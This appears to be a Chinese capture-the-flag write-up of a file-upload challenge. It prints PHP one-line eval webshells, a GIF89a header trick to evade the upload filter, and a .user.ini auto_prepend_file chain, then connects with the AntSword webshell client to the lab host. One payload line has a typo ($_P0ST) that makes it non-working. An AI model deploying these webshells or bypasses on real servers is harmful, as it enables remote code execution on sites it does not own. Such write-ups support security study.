開啟環境有一個檔案上傳的介面
結合題目名字,這是一道木馬上傳的題目
直接上傳木馬圖片
給出回顯“Your file looks wicked”,這說明了此處的檔案上傳存在過濾
首先嚐試修改一句話木馬的構造
<?php @eval($_POST['1']);?>
<?=eval($_POST['1']);?>
利用直接利用短標籤繞過上傳任然被識別,嘗試在構造時加上GIF89a(圖片檔案頭)
GIF89a <?=eval($_POST['a']);?>
加上圖片頭後能夠上傳成功
此時上傳的是圖片檔案,蟻劍無法連線 但能看出可以透過這個方法進行過濾。嘗試在提交過程抓包改為php檔案,發現被阻止
這裡瞭解到一個新的方法:
.user.ini檔案
auto_prepend_file的用法:
auto_prepend_file可以讓所有的php檔案自動的包含某個檔案。
例如在.user.ini檔案中寫入
auto_prepend_file=a.jpg
然後在a.jpg中寫入一個一句話程式碼
<?php eval($_P0ST['a']); ?>
那麼和.user.ini和a.jpg同一目錄下的所有php檔案都會包含a.jpg檔案。
這時候就可以利用蟻劍對上傳木馬進行連線
而在這道題目中我們需要加上圖片頭GIF89a,所以:
.user.ini: GIF89a auto_prepend_file=a.jpg a.jpg: GIF89a <?=eval($_POST['a']);?>
上傳檔案.user.ini修改檔案型別
上傳檔案a.jpg
上傳成功,嘗試利用蟻劍進行連線
直接連線連線圖片路徑,連線失敗
檢視流量,此處的檔案目錄應該為http://61.147.171.105:59158/uploads/index.php